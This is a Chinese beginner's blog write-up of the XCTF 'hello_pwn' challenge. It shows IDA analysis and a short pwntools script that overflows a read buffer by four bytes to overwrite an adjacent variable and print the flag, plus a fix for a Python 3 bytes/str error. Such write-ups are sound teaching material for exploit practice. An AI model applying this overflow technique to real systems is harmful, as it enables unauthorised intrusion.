初学pwn-攻防世界(hello_pwn)

这篇博客介绍了初学者如何解决攻防世界的hello_pwn题目。通过ida反编译分析,找到关键的dword_60106C变量,利用read函数输入特定payload,改变变量值以触发输出flag.txt。在编写Python脚本过程中,遇到了字符类型不匹配的问题,通过使用decode方法解决了该问题,最终成功获取flag。
摘要由CSDN通过智能技术生成

初学pwn-writeUp

攻防世界的第二道题目,hello_pwn。
首先创建场景,使用nc进入远端,发现他只输出了一串字符串,没有别的内容,也无法使用ls查看它的文件。
下载场景提供的文件,使用cat查看,发现是ELF文件,按照大佬的流程,ELF文件直接用ida打开。
初次使用ida,深切的感受到了ida的强大。
打开之后,按F5,进行反编译,可以看到main函数的伪代码
在这里插入图片描述
可以从main函数中看到,这里存在一个判断,如果条件达成的话,会调用一个函数。点开函数看一下。
在这里插入图片描述
可以发现里边会输出flag.txt,也就是我们的目标,所以我们现在需要使 dword_60106C 的值与 1853186401相等。点金这个变量看一下。发现它与unk_601068 的地址只相差四个字节。并且在main函数中有一个read在读取数据输入到变量中。
因此,我们可以利用read函数,将dword_60106C的值修改为1853186401。
在这里插入图片描述
具体脚本如下

from pwn import *

p=remote('111.200.241.244',57832)
payload = 'a'*4 + p64(1853186401).decode("iso-8859-1")
p.recvuntil("bof")
p.sendline(payload)
p.interactive()

这是使用sendline,在read进行读取的时候,想其中输入4个‘a’,因为一个字符型变量占据一个字节的空间,所以向后偏移之后,1853186401这个值就会赋给dword_60106C,达成条件,调用函数,获得flag。
在这里插入图片描述
提交,成功。

在编写脚本的时候,遇到一个问题。因为我使用的是python3,对数据的格式要求更严格,因此,如果使用

payload = 'a' * 4 + p64(1853186401)

进行编译的话,会报错
在这里插入图片描述

  File "mex.py", line 4, in <module>
    payload = 'a'*4  + p64(1853186401)
TypeError: can only concatenate str (not "bytes") to str

这里显示字符类型不匹配,因此不能进行拼接。经过百度,有个大佬给出了一个解决方法,对他进行转码

payload = 'a'*4 + p64(1853186401).decode("iso-8859-1")

解决问题。

  • 3
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值